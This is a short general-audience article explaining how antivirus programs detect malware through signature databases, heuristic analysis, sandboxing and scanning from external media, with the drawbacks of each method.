How Do Antivirus Programs Detect Malware

Malware is a serious threat that keeps expanding by the year. Along with old standbys like viruses and worms, newer creations like spyware and ransomware have appeared. The internet, in particular, has helped spawn a wide variety of new malware and made the older forms more widespread. Having a network available provides malicious hackers opportunities to both spread malware to more computers and to anonymously collect valuable information from the infected machines. This situation has created a cat-and-mouse game between malware developers and antivirus software creators. Just a quick look at the threats listed in comparisons of major antivirus packages provides a good idea of how the problem keeps growing.

Weapons of Choice

What’s particularly interesting in this battle is that antivirus software relies on three basic strategies to combat the array of threats. They utilize either a signature database, heuristics, or a sandbox to identify and eliminate malware. Each approach has its advantages and disadvantages. As a result, protection software often needs to employ all three against any given type of malware.


The most prevalent method of creating a piece of malware is to simply take existing code and make relatively minor alterations to it. Because of this, it’s possible for antivirus software to identify the threat by comparing its signatures to a database list, also called a dictionary, of known viruses and other malware. The drawback to this technique is that if the malware has been radically altered or is a completely new code, there’ll be no signature to match it to. Nevertheless, this method catches most threats out there.

Looking Suspicious

The heuristics approach is used when a problem is detected, but there are no indications of malware signatures. With heuristics, the suspected code is examined in detail to see if it possesses instructions that resemble those of various types of malware. For example, if a command is found that attempts to collect the user’s keystrokes, it usually points towards nefarious intentions. The weak spots in this method are that it can generate a lot of false positives and also can be evaded by malware that’s heavily disguised using sophisticated cryptographic techniques.

Test Run

The final primary method of searching for malware is the sandbox approach. Often, this can be a limited set-up that runs the suspected software to see what it actually does. Sometimes, it can take the shape of a virtual machine that emulates an entire operating system. A virtual machine can catch malware that’s been designed to appear harmless unless it has access to all the components of a computer that are available through the operating system. The problem with this approach is it’s time-consuming.

Staying Outside

In addition to these basic detection methods, effective antivirus software also requires the ability to examine a computer from a CD-ROM or USB flash drive. By running the protective software from a secondary source, the potentially infected hard drive is inactive. This prevents the malware from actively mounting a defense against detection.

We will be happy to hear your thoughts

Leave a reply